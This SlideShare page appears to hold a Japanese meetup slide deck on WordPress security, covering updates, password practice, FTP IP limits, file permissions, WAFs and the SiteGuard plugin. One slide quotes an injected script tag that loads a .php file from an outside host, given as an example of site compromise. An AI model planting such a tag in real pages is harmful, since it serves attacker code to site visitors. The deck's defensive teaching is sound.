Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Word benchfukuoka

3,307 views

Published on

WordBenchFukuoka in FUKUOKA MEETUP COMMUNITY

Published in: Internet
  • Be the first to comment

Word benchfukuoka

  1. 1. WordBench Fukuoka もうそろそろ4.2ベータ1回目くらいかな? 2015年3月7日
  2. 2. WordPressのセキュリティについて 考える
  3. 3. 万野 潤二
 GMOペパボ
 糸島芸農
 福岡移住計画
  4. 4. WordPressのセキュリティについて WordPressの更新 サーバーの脆弱性 ユーザー名とパスワード FTPアクセス制限
 WAFの導入 ファイルパーミッション プラグインの利用
  5. 5. 何が起こっているの? コメント・ピンバックスパム。かつ対象ページにア クセスされるとサーバー負荷に.. サイトとは関係のないサイトへのリダイレクト (URL書き換え)しかもサーチエンジン経由のみ アクセスされるたびに外部スクリプトが実行されて いる.. メール大量配信の踏み台に.. サイトが表示されなくなる。ここで
 はじめて気づく..
  6. 6. コードを埋め込まれた例 <!--5va837--><script type="text/javascript" src="http://abcdefg.pl/wp- content/themes/twentyfourteen/ftuhdw7q.php?id=1766503"></ script><!--/5va837-->
  7. 7. http://www.google.com/safebrowsing/diagnostic?site=http://example.com
  8. 8. 何で起こっているの? ブルート・フォース・アタック 総当たり・辞書による攻撃 FTPアカウント剥奪 マルウェアに感染し、第三者から不正にFTP接続されファイ ルの設置、改ざんが行われる
  9. 9. 何で起こっているの? プラグインの脆弱性 最近だとRevSliderプラグインを狙ったマルウェアが10万サイトを 汚染 http://blog.sucuri.net/2014/12/soaksoak-malware-compromises- 100000-wordpress-websites.html その他にもJoomla,WordPressのプラグインなどに使用されている ofc_upload_image.phpの脆弱性 提供元は信頼を失うことにも..
 また、使用していないテーマ・プラグインは要削除。
  10. 10. WordPressの更新 WordPressの自動更新は有効に。 Update Control(プラグイン) 自動バックグラウンド更新の設定を簡単に設定す ることができる。
  11. 11. サーバーの脆弱性 信頼できるサーバー会社、サービスを利用する。 セキュリティニュース、IPA、JVN などのトピックを チェック。
  12. 12. ユーザー名とパスワード
  13. 13. ユーザー名は”admin”であっては ならない by HostGator.com Photo by http://www.pakutaso.com/
  14. 14. ユーザー名 ブルート・フォース・アタックの標的 •管理者権限剥奪、権限悪用、個人情報漏洩... 攻撃されやすいユーザー名 •admin, test,123456, demo, administrator, root, webmaster...
  15. 15. ユーザー名 作成されたアカウントadminは削除できない
 →他の管理者アカウントを作成し削除
  16. 16. パスワード 安易なパスワードを設定しない。
  17. 17. FTPアクセス制限 万一FTPアカウント情報が第三者に渡ったら。格好の 侵入経路となり、ファイルの改ざん、設置し放題。 →そもそもFTP接続する場所は限定されるはずなの で、IPアドレスによる制限(.ftpaccess)を実施。 <Limit ALL> Order Allow,Deny Allow from 111.111.111.111 # home Allow from 123.123.123.123 # office Deny from all </Limit>
  18. 18. WAFの導入 SQLインジェクションやクロスサイトスクリプティング など、Webアプリケーション上の脆弱性をカバーする装 置。
 WAFは通常のファイアウォールと同様にすべてのHTTP/ HTTPSトラフィックを中継し、通信の内容を精査する。 GNUライセンスの下で公開されているオープンソースの Webアプリケーションファイアウォール。
  19. 19. パーミッション WordPressの安全性を高める
 ファイルパーミッション http://goo.gl/wF1Wpj 600 -rw------- /home/user/wp-config.php 604 -rw----r-- /home/user/cgi-bin/.htaccess 600 -rw------- /home/user/cgi-bin/php.ini 711 -rwx--x--x /home/user/cgi-bin/php.cgi 100 ---x------ /home/user/cgi-bin/php5.cgi ※ wp-config 400  wp-admin/install.php 000
  20. 20. プラグインの導入
  21. 21. SiteGuard WP Plugin
  22. 22. SiteGuard WP Plugin SiteGuard WP Pluginは、WordPressにインストールするだ けで、セキュリティを向上させることができます。 SiteGurad WP Pluginは、管理ページとログインに関する攻 撃からの防御に特化したセキュリティプラグインです。 WAF ( SiteGuard Lite )の除外ルールを作成する機能もあり ます。( 使用するにはWAFがWebサーバにインストール されている必要があります )
  23. 23. 管理ページアクセス制限 ログインページ変更 画像認証 ログイン詳細エラーメッセー ジの無効化 ログインロック ログインアラート フェールワンス ピンバック無効化 更新通知 WAFチューニングサポー ト SiteGuard WP Plugin
  24. 24. SiteGuard WP Plugin 管理ページアクセス制限 アクセス元のIPアドレスによる 制限を実施。 アクセス元IPアドレスが複数、 不定期に更新される場合。 会員向けサイト(複数のユー ザ)には利用し難い。
  25. 25. SiteGuard WP Plugin ログインページ変更 そもそもブルートフォース、リス ト攻撃の標的は wp-login.php なの で、ページそのものを変更する ことが有効。 初期値は「login_(5桁の乱数)」で すが、好みの名前に変更するこ とができる。 例 http://manno.jp/login_38521
  26. 26. SiteGuard WP Plugin 画像認証 ログインページ、コメント投 稿に画像認証(ひらがな、英 数字)を追加します。
  27. 27. SiteGuard WP Plugin ログイン詳細エラーメッセー ジの無効化 ログインエラーしたときの詳 細なエラーメッセージに変え て、単一のメッセージを返し ます。
  28. 28. SiteGuard WP Plugin ログインロック ログイン失敗を繰り返す接 続元を一定期間ロックしま す。 似た機能を持つプラグイン
 Simple Login Lockdown http:// wordpress.org/extend/plugins/
  29. 29. SiteGuard WP Plugin ログインアラート ログインがあったことを、 メールで通知します。
  30. 30. SiteGuard WP Plugin フェールワンス ユーザ名、パスワードが正 しい入力を行っても、ログ インを一回失敗します。
  31. 31. SiteGuard WP Plugin ピンバック無効化 ピンバックの悪用(スパム) を防ぎます。
  32. 32. SiteGuard WP Plugin 更新通知 WordPress、プラグイン、 テーマの更新を、メールで 通知
  33. 33. SiteGuard WP Plugin WAFチューニングサポート webサーバーにJP-Secure製の WAF ( SiteGuard Lite ) が導入 されている場合利用可。 誤検知されたシグネチャの 除外リストを作成する。
  34. 34. WordPress Codex
 WordPressの安全性を高める
 http://goo.gl/qxN5Qx JP Secure
 SiteGuard WP Plugin
 http://goo.gl/w4ORQD JVN
 脆弱性対策情報データベース
 http://jvndb.jvn.jp/

×